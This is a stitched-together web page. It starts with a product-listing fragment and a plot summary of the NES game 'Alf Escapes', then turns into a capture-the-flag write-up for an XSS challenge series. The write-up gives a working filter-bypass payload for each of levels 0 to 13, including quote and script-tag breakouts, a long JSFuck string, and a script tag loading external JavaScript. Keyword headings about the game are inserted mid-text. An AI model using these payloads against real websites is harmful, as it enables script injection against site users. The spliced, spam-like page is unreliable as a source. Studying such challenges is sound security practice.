Find many great new & used options and get the best deals for Alf Escapes! NES Nintendo Great Condition! Escape at the best online prices at. Revisiting Alf’s Escape for Oddwor. We take a look back at our first wholly original piece of level design in nearly.
This game was requested, as well as created, from the mind of my buddy Chris Shepard. Enjoy!!!
The Tanner family is an average American family. One day, they discover that they have a visitor. He’s small, he’s furry, he’s arrogant, and he’s an alien from the planet Melmac. Unsure what to do, they name him ALF: Alien Life Form. Alf soon decides that as much as he misses his home planet, there’s a lot to be said for Earth: the Tanners are willing to concede anything as long as he doesn’t announce his presence. Oh yeah, the the Tanners also have a cat, which looks rather tasty… Anyways, while living with the Tanners, Alf is captured by the A.T.F. (Alien Task Force). While there, Alf discovers that his ship has been repaired. Seeing this may be his only chance to escape, Alf begins to cooperate with the A.T.F. After working with the A.T.F. for some time, they began to trust ALF. Once ALF had earned the trust of the A.T.F., he learned of a secret experiment that used alien technology to make super strong beings. Upon learning this, he decided it was time to make his escape! ALF performed the experiment on himself, and immediately became stronger. Will ALF escape the A.T.F. base before the effects of the procedure wears off?
There are 15 challenges overall. So lets discuss the writeups one by one.
Level 0:
Well, this is very easy. There is no regex check, nor any filters so its very easy. Lets close the console.log() function first and then add our little alert(1) and balancing the quote afterwards.
Payload: “);alert(1)(“
Level 1:
A small change from the above question where ' (quotes) are filtered globally (see the /g in regex check) with a backslash. So the best way to bypass this is that we will give a backslash and then the quotes (which together renders like ' ) so both the backslashes will cancel each other and we can execute alert(1).
Payload: ');alert(1)//
Level 2:
If you read/play with JSON.stringify() more, you can see that it will escape double quotes. So we cannot inject it but an interesting thing is, it will not escape angle brackets. So the easiest way is close the script tag already opened and then start a new one with alert(1).
Payload: </script><script>alert(1)//
Level 3:
One quick thing you can notice with this challenge is that its on URL context. So the best way to bypass filters is to try URL encoding. Since double quotes (“) is filtered, we can bypass it by URL encoding the double quotes which is nothing but %22.
Payload: %22);alert(1)//
Level 4:
One quick thing to note here is that the developer has actually forgotten to globally remove double quotes (only the first instance is removed). We can make use of this. Also we can try exploiting the image alt features by creating an expected output by the REgex along with an event handler which triggers the XSS.
Payload: [[a|'onload='alert(1)]]
Level 5:
Well, things got interesting here as there is no way we can inject double quote here. So we need to make use of both img and href tag together in a way, one closes the other context and we can inject an event handler.
ok, this means we can control what ever comes inside the alt tag. Lets see what happens if we inject http:// there.
Now that looks cool. So now you can see that the alt context is escaped with the double quotes that comes with href which means we can try injecting our own event handler (since double quotes are filtered, we might want to try single quotes).
Payload: [[a|http://onload='alert(1)']]
Level 6:
This is one easy level where I got stuck for a long time. I used the browser console to try out so many functions that starts with “create” but it was too difficult to find out one which doesnot filter any characters. After so much of time, I looked into comments which is when I realized, this is so easy.
Well, lets close the comment and then inject our string.
Payload: Comment#--><script>alert(1)</script>
Level 7:
An important thing to note here is that callback can contain single quotes ' which can be of big help. Also we are already in the script context so the easiest thing to do is to put the entire thing inside single quotes so that it converts to a string and then inject our payload.
Payload: '#';alert(1)//
Level 8:
Well, the first thing came to my mind is to use JSFuck as it can easily bypass the uppercase filter but its length is too high. Another best way to do it is to close the existing script tag and reopen a new one with an src attribute.
Payload: </script><script src='site.com/1.js'>
Level 9:
Since angle brackets are closed here, there is no other way than to use JSFuck (non-alphanumeric javascript).
Payload: '+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])())//
I am not sure of any other ways to solve this. If you know a shorted method, please do comment on this post and let us discuss (I have seen some but was a bit difficult to understand) :)
Level 10:
This one comes inside the script context with quotes and angle brackets filtered. But one thing to note here is that the backslash is not escaped. So the easiest way here is to hex encode.
Alf Escapes Nes
Payload: u003cimg src=a onerror=alert(1)u003e
Level 11:
This one is easy as the filter they use is most common one that we can see around. After the injection, we need the word script.
Payload: </</scriptscript><script>alert(1)//
Alf Escapes Nes
Level 12:
This is quite similar to the one we saw before but with an exception that this time backslashes are escaped making it difficult for us to comment the rest of the string. Well, just use <!-- :P
Payload: '#';alert(1)<!--
Level 13:
I took quite sometime to understand this challenge but its almost clear for me (I had to read some writeups already written to understand this). The main point to understand here is that
if an iframe defines its window.name to youWon, then the new name will be injected in the parent’s global window object which inturn sets the youWon variable and it leads to the call of alert(1).
You can also see that what ever we give as input to print.alf.nu, it gets reflected back in the response which makes our tasks easier !
Payload: name='youWon'
Alf Escapes Nes Game
I still haven’t properly understood the last 2 levels of these challenges. I will update the page once I clearly understand how it can be solved. Thanks for the read and let me know if there are any comments !